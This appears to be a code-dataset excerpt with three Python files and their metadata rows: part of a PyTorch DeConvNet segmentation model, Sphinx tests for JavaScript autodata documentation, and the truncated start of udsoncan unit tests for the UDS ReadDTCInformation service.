nn.Conv2d(1, 64, 3, padding=1),
nn.BatchNorm2d(64, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# conv1_2
nn.Conv2d(64, 64, 3, padding=1),
nn.BatchNorm2d(64, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# pool1
nn.MaxPool2d(2, stride=2, return_indices=True, ceil_mode=True), )
# it returns outputs and pool_indices_1
# 48*48
self.conv_block2 = nn.Sequential(
# conv2_1
nn.Conv2d(64, 128, 3, padding=1),
nn.BatchNorm2d(128, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# conv2_2
nn.Conv2d(128, 128, 3, padding=1),
nn.BatchNorm2d(128, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# pool2
nn.MaxPool2d(2, stride=2, return_indices=True, ceil_mode=True), )
# it returns outputs and pool_indices_2
# 24*24
self.conv_block3 = nn.Sequential(
# conv3_1
nn.Conv2d(128, 256, 3, padding=1),
nn.BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# conv3_2
nn.Conv2d(256, 256, 3, padding=1),
nn.BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# conv3_3
nn.Conv2d(256, 256, 3, padding=1),
nn.BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# pool3
nn.MaxPool2d(2, stride=2, return_indices=True, ceil_mode=True), )
# it returns outputs and pool_indices_3
# 12*12
self.conv_block4 = nn.Sequential(
# conv4_1
nn.Conv2d(256, 512, 3, padding=1),
nn.BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# conv4_2
nn.Conv2d(512, 512, 3, padding=1),
nn.BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# conv4_3
nn.Conv2d(512, 512, 3, padding=1),
nn.BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# pool4
nn.MaxPool2d(2, stride=2, return_indices=True, ceil_mode=True), )
# it returns outputs and pool_indices_4
# 6*6
self.conv_block5 = nn.Sequential(
# conv5_1
nn.Conv2d(512, 512, 3, padding=1),
nn.BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# conv5_2
nn.Conv2d(512, 512, 3, padding=1),
nn.BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# conv5_3
nn.Conv2d(512, 512, 3, padding=1),
nn.BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# pool5
nn.MaxPool2d(2, stride=2, return_indices=True, ceil_mode=True), )
# it returns outputs and pool_indices_5
# 3*3
self.conv_block6 = nn.Sequential(
# fc6
nn.Conv2d(512, 4096, 3),
# set the filter size and no padding to make output into 1*1
nn.BatchNorm2d(4096, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True), )
# 1*1
self.conv_block7 = nn.Sequential(
# fc7
nn.Conv2d(4096, 4096, 1),
# set the filter size to make output into 1*1
nn.BatchNorm2d(4096, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True), )
self.deconv_block8 = nn.Sequential(
# fc6-deconv
nn.ConvTranspose2d(4096, 512, 3, stride=1),
nn.BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True), )
# 3*3
self.unpool_block9 = nn.Sequential(
# unpool5
nn.MaxUnpool2d(2, stride=2), )
# usage unpool(output, indices)
# 6*6
self.deconv_block10 = nn.Sequential(
# deconv5_1
nn.ConvTranspose2d(512, 512, 3, stride=1, padding=1),
nn.BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# deconv5_2
nn.ConvTranspose2d(512, 512, 3, stride=1, padding=1),
nn.BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# deconv5_3
nn.ConvTranspose2d(512, 512, 3, stride=1, padding=1),
nn.BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True), )
self.unpool_block11 = nn.Sequential(
# unpool4
nn.MaxUnpool2d(2, stride=2), )
# 12*12
self.deconv_block12 = nn.Sequential(
# deconv4_1
nn.ConvTranspose2d(512, 512, 3, stride=1, padding=1),
nn.BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# deconv4_2
nn.ConvTranspose2d(512, 512, 3, stride=1, padding=1),
nn.BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# deconv4_3
nn.ConvTranspose2d(512, 256, 3, stride=1, padding=1),
nn.BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True), )
self.unpool_block13 = nn.Sequential(
# unpool3
nn.MaxUnpool2d(2, stride=2), )
# 24*24
self.deconv_block14 = nn.Sequential(
# deconv3_1
nn.ConvTranspose2d(256, 256, 3, stride=1, padding=1),
nn.BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# deconv3_2
nn.ConvTranspose2d(256, 256, 3, stride=1, padding=1),
nn.BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# deconv3_3
nn.ConvTranspose2d(256, 128, 3, stride=1, padding=1),
nn.BatchNorm2d(128, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True), )
self.unpool_block15 = nn.Sequential(
# unpool2
nn.MaxUnpool2d(2, stride=2), )
# 48*48
self.deconv_block16 = nn.Sequential(
# deconv2_1
nn.ConvTranspose2d(128, 128, 3, stride=1, padding=1),
nn.BatchNorm2d(128, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# deconv2_2
nn.ConvTranspose2d(128, 64, 3, stride=1, padding=1),
nn.BatchNorm2d(64, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True), )
self.unpool_block17 = nn.Sequential(
# unpool1
nn.MaxUnpool2d(2, stride=2), )
# 96*96
self.deconv_block18 = nn.Sequential(
# deconv1_1
nn.ConvTranspose2d(64, 64, 3, stride=1, padding=1),
nn.BatchNorm2d(64, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# deconv1_2
nn.ConvTranspose2d(64, 64, 3, stride=1, padding=1),
nn.BatchNorm2d(64, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True), )
self.seg_score19 = nn.Sequential(
# seg-score
nn.Conv2d(64, self.n_classes, 1), )
if self.learned_billinear:
raise NotImplementedError
def forward(self, x):
size0 = x.size()
conv1, indices1 = self.conv_block1(x)
size1 = conv1.size()
conv2, indices2 = self.conv_block2(conv1)
size2 = conv2.size()
conv3, indices3 = self.conv_block3(conv2)
size3 = conv3.size()
conv4, indices4 = self.conv_block4(conv3)
size4 = conv4.size()
conv5, indices5 = self.conv_block5(conv4)
conv6 = self.conv_block6(conv5)
conv7 = self.conv_block7(conv6)
conv8 = self.deconv_block8(conv7) + conv5
conv9 = self.unpool(conv8,indices5, output_size=size4)
conv10 = self.deconv_block10(conv9) + conv4
conv11 = self.unpool(conv10,indices4, output_size=size3)
conv12 = self.deconv_block12(conv11) + conv3
conv13 = self.unpool(conv12,indices3, output_size=size2)
conv14 = self.deconv_block14(conv13) + conv2
conv15 = self.unpool(conv14,indices2, output_size=size1)
conv16 = self.deconv_block16(conv15) + conv1
conv17 = self.unpool(conv16,indices1, output_size=size0)
conv18 = self.deconv_block18(conv17)
out = self.seg_score19(conv18)
return out
def init_vgg16_params(self, vgg16, copy_fc8=True):
blocks = [self.conv_block1,
self.conv_block2,
self.conv_block3,
self.conv_block4,
self.conv_block5]
ranges = [[0, 4], [5, 9], [10, 16], [17, 23], [24, 29]]
features = list(vgg16.features.children())
i_layer = 0
# copy convolutional filters from vgg16
for idx, conv_block in enumerate(blocks):
for l1, l2 in zip(features[ranges[idx][0]:ranges[idx][1]], conv_block):
if isinstance(l1, nn.Conv2d) and isinstance(l2, nn.Conv2d):
if i_layer == 0:
# average VGG16's three RGB input channels into the single seismic input channel
l2.weight.data = ((l1.weight.data[:, 0, :, :] + l1.weight.data[:, 1, :, :] + l1.weight.data[:, 2, :, :]) / 3.0).view(l2.weight.size())
l2.bias.data = l1.bias.data
i_layer = i_layer + 1
else:
assert l1.weight.size() == l2.weight.size()
assert l1.bias.size() == l2.bias.size()
l2.weight.data = l1.weight.data
l2.bias.data = l1.bias.data
i_layer = i_layer + 1
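# A minimal usage sketch of the two classes above, assuming a dummy single-channel
# 96x96 patch (matching the 96*96 size annotations in the blocks); the batch size,
# the torch import location and the __main__ guard are illustrative choices only.
if __name__ == "__main__":
    import torch
    model = DeConvNet(n_classes=4)
    patch = torch.randn(2, 1, 96, 96)      # two single-channel 96x96 patches
    scores = model(patch)                  # per-pixel class scores
    assert scores.shape == (2, 4, 96, 96)  # spatial size preserved, one channel per class
    # DeConvNetSkip takes the same input; its decoder additionally adds the encoder
    # feature maps back in (see its forward method above).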
| 34.029595
| 118
| 0.53568
| 2,712
| 21,847
| 4.228614
| 0.082596
| 0.020405
| 0.070806
| 0.075863
| 0.962853
| 0.962853
| 0.962853
| 0.962853
| 0.962853
| 0.962853
| 0
| 0.120703
| 0.340916
| 21,847
| 642
| 119
| 34.029595
| 0.675741
| 0.087792
| 0
| 0.957507
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.011331
| 1
| 0.016997
| false
| 0
| 0.002833
| 0
| 0.031161
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
60cc15af01f7500379adf3061e66c6c28138a010
| 10,586
|
py
|
Python
|
test/unit/directive/test_directive_js_data.py
|
buddly27/champollion
|
aa53804ad11e32f1bb8dcb02668c6df3771efcaa
|
[
"Apache-2.0"
] | 3
|
2017-06-13T01:36:32.000Z
|
2020-12-14T18:26:01.000Z
|
test/unit/directive/test_directive_js_data.py
|
buddly27/champollion
|
aa53804ad11e32f1bb8dcb02668c6df3771efcaa
|
[
"Apache-2.0"
] | 1
|
2018-09-27T16:13:48.000Z
|
2020-06-03T22:27:56.000Z
|
test/unit/directive/test_directive_js_data.py
|
buddly27/champollion
|
aa53804ad11e32f1bb8dcb02668c6df3771efcaa
|
[
"Apache-2.0"
] | null | null | null |
# :coding: utf-8
import os
import pytest
from sphinx.cmd.build import main as sphinx_main
from sphinx.util.osutil import cd
import utility
@pytest.fixture()
def doc_folder_with_code(doc_folder):
"""Return Doc folder with Javascript example source code.
"""
js_source = os.path.join(doc_folder, "example")
with open(os.path.join(js_source, "index.js"), "w") as f:
f.write(
"/**\n"
" * A variable\n"
" *\n"
" * .. note::\n"
" *\n"
" * A note.\n"
" */\n"
"export default const VARIABLE_INT = 42;\n"
"\n"
"/**\n"
" * Another variable\n"
" *\n"
" * A citation::\n"
" *\n"
" * A citation\n"
" */\n"
"var VARIABLE_OBJECT = {\n"
" key1: 'value1',\n"
" key2: 'value2',\n"
" key3: 'value3',\n"
"};\n"
"\n"
"export let VARIABLE_STRING = 'rosebud';\n"
)
return doc_folder
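# The fixture above writes a small JS module whose doc-comments are the only
# documentation source; each test below renders an index.rst containing
# ".. js:autodata::" directives with different options (:alias:, :module-alias:,
# :module-path-alias:, :force-partial-import:, :skip-value:) and compares the
# Sphinx text-builder output with the expected rendering.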
def test_directive_autodata(doc_folder_with_code):
"""Generate documentation from global data variables.
"""
index_file = os.path.join(doc_folder_with_code, "index.rst")
with open(index_file, "w") as f:
f.write(
".. js:autodata:: example.VARIABLE_INT\n"
"\n"
".. js:autodata:: example.VARIABLE_OBJECT\n"
"\n"
".. js:autodata:: example.VARIABLE_STRING\n"
)
with cd(doc_folder_with_code):
sphinx_main(["-c", ".", "-b", "text", "-E", ".", "_build"])
with open(
os.path.join(doc_folder_with_code, "_build", "index.txt"), "rb"
) as f:
content = utility.sanitize_value(f.read())
assert content == (
"const example.VARIABLE_INT = 42\n"
"\n"
" \"import VARIABLE_INT from \"example\"\"\n"
"\n"
" A variable\n"
"\n"
" Note:\n"
"\n"
" A note.\n"
"\n"
"var example.VARIABLE_OBJECT = { "
"key1: value1, key2: value2, key3: value3, }\n"
"\n"
" Another variable\n"
"\n"
" A citation:\n"
"\n"
" A citation\n"
"\n"
"let example.VARIABLE_STRING = rosebud\n"
"\n"
" \"import {VARIABLE_STRING} from \"example\"\"\n"
)
def test_directive_autodata_with_alias(doc_folder_with_code):
"""Generate documentation from global data variables with alias.
"""
index_file = os.path.join(doc_folder_with_code, "index.rst")
with open(index_file, "w") as f:
f.write(
".. js:autodata:: example.VARIABLE_INT\n"
" :alias: ALIASED_VARIABLE_INT\n"
"\n"
".. js:autodata:: example.VARIABLE_OBJECT\n"
" :alias: ALIASED_VARIABLE_OBJECT\n"
"\n"
".. js:autodata:: example.VARIABLE_STRING\n"
" :alias: ALIASED_VARIABLE_STRING\n"
)
with cd(doc_folder_with_code):
sphinx_main(["-c", ".", "-b", "text", "-E", ".", "_build"])
with open(
os.path.join(doc_folder_with_code, "_build", "index.txt"), "rb"
) as f:
content = utility.sanitize_value(f.read())
assert content == (
"const example.ALIASED_VARIABLE_INT = 42\n"
"\n"
" \"import ALIASED_VARIABLE_INT from \"example\"\"\n"
"\n"
" A variable\n"
"\n"
" Note:\n"
"\n"
" A note.\n"
"\n"
"var example.ALIASED_VARIABLE_OBJECT = { "
"key1: value1, key2: value2, key3: value3, }\n"
"\n"
" Another variable\n"
"\n"
" A citation:\n"
"\n"
" A citation\n"
"\n"
"let example.ALIASED_VARIABLE_STRING = rosebud\n"
"\n"
" \"import {ALIASED_VARIABLE_STRING} from \"example\"\"\n"
)
def test_directive_autodata_with_module_alias(doc_folder_with_code):
"""Generate documentation from global data variables with module alias.
"""
index_file = os.path.join(doc_folder_with_code, "index.rst")
with open(index_file, "w") as f:
f.write(
".. js:autodata:: example.VARIABLE_INT\n"
" :module-alias: alias_module\n"
"\n"
".. js:autodata:: example.VARIABLE_OBJECT\n"
" :module-alias: alias_module\n"
"\n"
".. js:autodata:: example.VARIABLE_STRING\n"
" :module-alias: alias_module\n"
)
with cd(doc_folder_with_code):
sphinx_main(["-c", ".", "-b", "text", "-E", ".", "_build"])
with open(
os.path.join(doc_folder_with_code, "_build", "index.txt"), "rb"
) as f:
content = utility.sanitize_value(f.read())
assert content == (
"const alias_module.VARIABLE_INT = 42\n"
"\n"
" \"import VARIABLE_INT from \"example\"\"\n"
"\n"
" A variable\n"
"\n"
" Note:\n"
"\n"
" A note.\n"
"\n"
"var alias_module.VARIABLE_OBJECT = { "
"key1: value1, key2: value2, key3: value3, }\n"
"\n"
" Another variable\n"
"\n"
" A citation:\n"
"\n"
" A citation\n"
"\n"
"let alias_module.VARIABLE_STRING = rosebud\n"
"\n"
" \"import {VARIABLE_STRING} from \"example\"\"\n"
)
def test_directive_autodata_with_module_path_alias(doc_folder_with_code):
"""Generate documentation from global data variables with module path alias.
"""
index_file = os.path.join(doc_folder_with_code, "index.rst")
with open(index_file, "w") as f:
f.write(
".. js:autodata:: example.VARIABLE_INT\n"
" :module-path-alias: test/alias/module\n"
"\n"
".. js:autodata:: example.VARIABLE_OBJECT\n"
" :module-path-alias: test/alias/module\n"
"\n"
".. js:autodata:: example.VARIABLE_STRING\n"
" :module-path-alias: test/alias/module\n"
)
with cd(doc_folder_with_code):
sphinx_main(["-c", ".", "-b", "text", "-E", ".", "_build"])
with open(
os.path.join(doc_folder_with_code, "_build", "index.txt"), "rb"
) as f:
content = utility.sanitize_value(f.read())
assert content == (
"const example.VARIABLE_INT = 42\n"
"\n"
" \"import VARIABLE_INT from \"test/alias/module\"\"\n"
"\n"
" A variable\n"
"\n"
" Note:\n"
"\n"
" A note.\n"
"\n"
"var example.VARIABLE_OBJECT = { "
"key1: value1, key2: value2, key3: value3, }\n"
"\n"
" Another variable\n"
"\n"
" A citation:\n"
"\n"
" A citation\n"
"\n"
"let example.VARIABLE_STRING = rosebud\n"
"\n"
" \"import {VARIABLE_STRING} from \"test/alias/module\"\"\n"
)
def test_directive_autodata_with_partial_import_forced(doc_folder_with_code):
"""Generate documentation from global data variables with partial import
forced.
"""
index_file = os.path.join(doc_folder_with_code, "index.rst")
with open(index_file, "w") as f:
f.write(
".. js:autodata:: example.VARIABLE_INT\n"
" :force-partial-import:\n"
"\n"
".. js:autodata:: example.VARIABLE_OBJECT\n"
" :force-partial-import:\n"
"\n"
".. js:autodata:: example.VARIABLE_STRING\n"
" :force-partial-import:\n"
)
with cd(doc_folder_with_code):
sphinx_main(["-c", ".", "-b", "text", "-E", ".", "_build"])
with open(
os.path.join(doc_folder_with_code, "_build", "index.txt"), "rb"
) as f:
content = utility.sanitize_value(f.read())
assert content == (
"const example.VARIABLE_INT = 42\n"
"\n"
" \"import {VARIABLE_INT} from \"example\"\"\n"
"\n"
" A variable\n"
"\n"
" Note:\n"
"\n"
" A note.\n"
"\n"
"var example.VARIABLE_OBJECT = { "
"key1: value1, key2: value2, key3: value3, }\n"
"\n"
" Another variable\n"
"\n"
" A citation:\n"
"\n"
" A citation\n"
"\n"
"let example.VARIABLE_STRING = rosebud\n"
"\n"
" \"import {VARIABLE_STRING} from \"example\"\"\n"
)
def test_directive_autodata_with_value_skipped(doc_folder_with_code):
"""Generate documentation from global data variables with value skipped.
"""
index_file = os.path.join(doc_folder_with_code, "index.rst")
with open(index_file, "w") as f:
f.write(
".. js:autodata:: example.VARIABLE_INT\n"
" :skip-value:\n"
"\n"
".. js:autodata:: example.VARIABLE_OBJECT\n"
" :skip-value:\n"
"\n"
".. js:autodata:: example.VARIABLE_STRING\n"
" :skip-value:\n"
)
with cd(doc_folder_with_code):
sphinx_main(["-c", ".", "-b", "text", "-E", ".", "_build"])
with open(
os.path.join(doc_folder_with_code, "_build", "index.txt"), "rb"
) as f:
content = utility.sanitize_value(f.read())
assert content == (
"const example.VARIABLE_INT\n"
"\n"
" \"import VARIABLE_INT from \"example\"\"\n"
"\n"
" A variable\n"
"\n"
" Note:\n"
"\n"
" A note.\n"
"\n"
"var example.VARIABLE_OBJECT\n"
"\n"
" Another variable\n"
"\n"
" A citation:\n"
"\n"
" A citation\n"
"\n"
"let example.VARIABLE_STRING\n"
"\n"
" \"import {VARIABLE_STRING} from \"example\"\"\n"
)
| 30.862974
| 80
| 0.473361
| 1,140
| 10,586
| 4.208772
| 0.074561
| 0.034181
| 0.016882
| 0.088579
| 0.887662
| 0.862026
| 0.844519
| 0.844519
| 0.829304
| 0.814089
| 0
| 0.007431
| 0.377102
| 10,586
| 342
| 81
| 30.953216
| 0.7202
| 0.04761
| 0
| 0.795848
| 0
| 0
| 0.35668
| 0.095347
| 0
| 0
| 0
| 0
| 0.020761
| 1
| 0.024221
| false
| 0
| 0.072664
| 0
| 0.100346
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
60f6fcf7e510245d4a699aaff5ff21f04bd0ca60
| 125,128
|
py
|
Python
|
test/client/test_read_dtc_information.py
|
autopi-io/py-udsoncan
|
2351ee02bf4a70e5661d6fd5f48f58db740f244e
|
[
"MIT"
] | 1
|
2021-03-21T12:18:23.000Z
|
2021-03-21T12:18:23.000Z
|
test/client/test_read_dtc_information.py
|
autopi-io/py-udsoncan
|
2351ee02bf4a70e5661d6fd5f48f58db740f244e
|
[
"MIT"
] | null | null | null |
test/client/test_read_dtc_information.py
|
autopi-io/py-udsoncan
|
2351ee02bf4a70e5661d6fd5f48f58db740f244e
|
[
"MIT"
] | null | null | null |
from __future__ import with_statement
from __future__ import absolute_import
from udsoncan.client import Client
from udsoncan import services, DidCodec
from udsoncan.exceptions import *
from test.ClientServerTest import ClientServerTest
from udsoncan import Dtc
import struct
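# Reading note on the harness (an interpretation, based only on the code below): each
# scenario appears twice -- the plain "test_*" method appears to play the stub ECU side,
# reading the raw request from conn.touserqueue and pushing a canned response onto
# conn.fromuserqueue, while the matching "_test_*" method drives self.udsclient and
# asserts on the parsed result. The byte strings are UDS ReadDTCInformation (0x19)
# requests and their 0x59 positive responses.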
class GenericTest_RequestStatusMask_ResponseNumberOfDTC(object):
def __init__(self, subfunction, client_function):
self.sb = struct.pack(u'B', subfunction)
self.badsb = struct.pack(u'B', subfunction+1)
self.client_function = client_function
def test_normal_behaviour_param_int(self):
request = self.conn.touserqueue.get(timeout=0.2)
self.assertEqual(request, "\x19"+self.sb+"\x5A")
self.conn.fromuserqueue.put("\x59"+self.sb+"\xFB\x01\x12\x34")
def _test_normal_behaviour_param_int(self):
response = getattr(self.udsclient, self.client_function).__call__(0x5A)
self.assertEqual(response.service_data.dtc_format, Dtc.Format.ISO14229_1)
self.assertEqual(response.service_data.dtc_count, 0x1234)
def test_normal_behaviour_param_instance(self):
request = self.conn.touserqueue.get(timeout=0.2)
self.assertEqual(request, "\x19"+self.sb+"\x5A")
self.conn.fromuserqueue.put("\x59"+self.sb+"\xFB\x01\x12\x34")
def _test_normal_behaviour_param_instance(self):
response = getattr(self.udsclient, self.client_function).__call__(Dtc.Status(test_failed_this_operation_cycle = True, confirmed = True, test_not_completed_since_last_clear = True, test_not_completed_this_operation_cycle = True))
self.assertEqual(response.service_data.dtc_format, Dtc.Format.ISO14229_1)
self.assertEqual(response.service_data.dtc_count, 0x1234)
def test_normal_behaviour_harmless_extra_byte(self):
self.wait_request_and_respond("\x59"+self.sb+"\xFB\x01\x12\x34\x00\x11\x22")
def _test_normal_behaviour_harmless_extra_byte(self):
response = getattr(self.udsclient, self.client_function).__call__(0x5A)
self.assertEqual(response.service_data.dtc_format, Dtc.Format.ISO14229_1)
self.assertEqual(response.service_data.dtc_count, 0x1234)
def test_bad_response_subfn_exception(self):
self.wait_request_and_respond("\x59"+self.badsb+"\xFB\x01\x12\x34")
def _test_bad_response_subfn_exception(self):
with self.assertRaises(UnexpectedResponseException):
getattr(self.udsclient, self.client_function).__call__(0x5A)
def test_bad_response_subfn_no_exception(self):
self.wait_request_and_respond("\x59"+self.badsb+"\xFB\x01\x12\x34")
def _test_bad_response_subfn_no_exception(self):
self.udsclient.config[u'exception_on_unexpected_response'] = False
response = getattr(self.udsclient, self.client_function).__call__(0x5A)
self.assertTrue(response.valid)
self.assertTrue(response.unexpected)
def test_bad_response_service_exception(self):
self.wait_request_and_respond("\x6F"+self.sb+"\xFB\x01\x12\x34")
def _test_bad_response_service_exception(self):
with self.assertRaises(UnexpectedResponseException):
getattr(self.udsclient, self.client_function).__call__(0x5A)
def test_bad_response_service_no_exception(self):
self.wait_request_and_respond("\x6F"+self.sb+"\xFB\x01\x12\x34")
def _test_bad_response_service_no_exception(self):
self.udsclient.config[u'exception_on_unexpected_response'] = False
response = getattr(self.udsclient, self.client_function).__call__(0x5A)
self.assertTrue(response.valid)
self.assertTrue(response.unexpected)
def test_bad_length_response_exception(self):
self.wait_request_and_respond("\x59")
self.wait_request_and_respond("\x59"+self.sb)
self.wait_request_and_respond("\x59"+self.sb+"\xFB")
self.wait_request_and_respond("\x59"+self.sb+"\xFB\x01")
self.wait_request_and_respond("\x59"+self.sb+"\xFB\x01\x12")
def _test_bad_length_response_exception(self):
for i in xrange(5):
with self.assertRaises(InvalidResponseException):
getattr(self.udsclient, self.client_function).__call__(0x5A)
def test_bad_length_response_no_exception(self):
self.udsclient.config[u'exception_on_invalid_response'] = False
self.wait_request_and_respond("\x59")
self.wait_request_and_respond("\x59"+self.sb)
self.wait_request_and_respond("\x59"+self.sb+"\xFB")
self.wait_request_and_respond("\x59"+self.sb+"\xFB\x01")
self.wait_request_and_respond("\x59"+self.sb+"\xFB\x01\x12")
def _test_bad_length_response_no_exception(self):
for i in xrange(5):
response = getattr(self.udsclient, self.client_function).__call__(0x5A)
self.assertFalse(response.valid)
def test_oob_value(self):
pass
def _test_oob_value(self):
with self.assertRaises(ValueError):
self.udsclient.get_number_of_dtc_by_status_mask(0x100)
with self.assertRaises(ValueError):
self.udsclient.get_number_of_dtc_by_status_mask(-1)
with self.assertRaises(ValueError):
self.udsclient.get_number_of_dtc_by_status_mask(u'aaa')
class TestReportNumberOfDTCByStatusMask(ClientServerTest, GenericTest_RequestStatusMask_ResponseNumberOfDTC): # Subfn = 0x1
def __init__(self, *args, **kwargs):
ClientServerTest.__init__(self, *args, **kwargs)
GenericTest_RequestStatusMask_ResponseNumberOfDTC.__init__(self, subfunction=0x1, client_function = u'get_number_of_dtc_by_status_mask')
class GenericTestStatusMaskRequest_DtcAndStatusMaskResponse(object):
def __init__(self, subfunction, client_function):
self.sb = struct.pack(u'B', subfunction)
self.badsb = struct.pack(u'B', subfunction+1)
self.client_function = client_function
def client_assert_response(self, response, expect_all_zero_third_dtc=False):
self.assertEqual(response.service_data.status_availability.get_byte_as_int(), 0xFB)
number_of_dtc = 3 if expect_all_zero_third_dtc else 2
self.assertEqual(len(response.service_data.dtcs), number_of_dtc)
self.assertEqual(response.service_data.dtc_count, number_of_dtc)
self.assertEqual(response.service_data.dtcs[0].id, 0x123456)
self.assertEqual(response.service_data.dtcs[0].status.get_byte_as_int(), 0x20)
self.assertEqual(response.service_data.dtcs[0].severity.get_byte_as_int(), 0x00)
self.assertEqual(response.service_data.dtcs[1].id, 0x123457)
self.assertEqual(response.service_data.dtcs[1].status.get_byte_as_int(), 0x60)
self.assertEqual(response.service_data.dtcs[1].severity.get_byte_as_int(), 0x00)
if expect_all_zero_third_dtc:
self.assertEqual(response.service_data.dtcs[2].id, 0)
self.assertEqual(response.service_data.dtcs[2].status.get_byte_as_int(), 0x00)
self.assertEqual(response.service_data.dtcs[2].severity.get_byte_as_int(), 0x00)
def test_normal_behaviour(self):
request = self.conn.touserqueue.get(timeout=0.2)
self.assertEqual(request, "\x19"+self.sb+"\x5A")
self.conn.fromuserqueue.put("\x59"+self.sb+"\xFB\x12\x34\x56\x20\x12\x34\x57\x60")
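# Byte-level reading of the canned response above: 0x59 is the ReadDTCInformation
# positive-response SID, self.sb echoes the sub-function, 0xFB is the status
# availability mask, then two 4-byte records follow -- DTC 0x123456 with status 0x20
# and DTC 0x123457 with status 0x60 -- matching client_assert_response above.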
def _test_normal_behaviour(self):
response = getattr(self.udsclient, self.client_function).__call__(0x5A)
self.client_assert_response(response)
def test_dtc_duplicate(self):
self.wait_request_and_respond("\x59"+self.sb+"\xFB\x12\x34\x56\x20\x12\x34\x56\x60")
def _test_dtc_duplicate(self):
response = getattr(self.udsclient, self.client_function).__call__(0x5A)
self.assertEqual(len(response.service_data.dtcs), 2) # We want both of them. The server should avoid sending duplicates
self.assertEqual(response.service_data.dtcs[0].id, 0x123456)
self.assertEqual(response.service_data.dtcs[0].status.get_byte_as_int(), 0x20)
self.assertEqual(response.service_data.dtcs[1].id, 0x123456)
self.assertEqual(response.service_data.dtcs[1].status.get_byte_as_int(), 0x60)
def test_normal_behaviour_param_instance(self):
request = self.conn.touserqueue.get(timeout=0.2)
self.assertEqual(request, "\x19"+self.sb+"\x5A")
self.conn.fromuserqueue.put("\x59"+self.sb+"\xFB\x12\x34\x56\x20\x12\x34\x57\x60")
def _test_normal_behaviour_param_instance(self):
getattr(self.udsclient, self.client_function).__call__(Dtc.Status(test_failed_this_operation_cycle = True, confirmed = True, test_not_completed_since_last_clear = True, test_not_completed_this_operation_cycle = True))
def test_normal_behaviour_zeropadding_ok_ignore_allzero(self):
data = '\x59'+self.sb+'\xFB\x12\x34\x56\x20\x12\x34\x57\x60'
for i in xrange(5):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_normal_behaviour_zeropadding_ok_ignore_allzero(self):
self.udsclient.config[u'tolerate_zero_padding'] = True
self.udsclient.config[u'ignore_all_zero_dtc'] = True
for i in xrange(5):
response = getattr(self.udsclient, self.client_function).__call__(0x5A)
self.client_assert_response(response, expect_all_zero_third_dtc=False)
def test_normal_behaviour_zeropadding_ok_consider_allzero(self):
data = '\x59'+self.sb+'\xFB\x12\x34\x56\x20\x12\x34\x57\x60'
for i in xrange(5):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_normal_behaviour_zeropadding_ok_consider_allzero(self):
self.udsclient.config[u'tolerate_zero_padding'] = True
self.udsclient.config[u'ignore_all_zero_dtc'] = False
expect_all_zero_third_dtc_values = [False, False, False, True, True]
for i in xrange(5):
response = getattr(self.udsclient, self.client_function).__call__(0x5A)
self.client_assert_response(response, expect_all_zero_third_dtc=expect_all_zero_third_dtc_values[i])
# Since we ignore all-zero DTCs, case number 4 with 4 extra 0 bytes is considered a valid answer, just as if these 0 bytes were not there
def test_normal_behaviour_zeropadding_notok_ignore_allzero_exception(self):
data = '\x59'+self.sb+'\xFB\x12\x34\x56\x20\x12\x34\x57\x60'
for i in xrange(5):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_normal_behaviour_zeropadding_notok_ignore_allzero_exception(self):
self.udsclient.config[u'tolerate_zero_padding'] = False
self.udsclient.config[u'ignore_all_zero_dtc'] = True
exception_values = [True, True, True, False, True]
expect_all_zero_third_dtc_values = [None, None, None, False, None]
for i in xrange(5):
if exception_values[i]:
with self.assertRaises(InvalidResponseException):
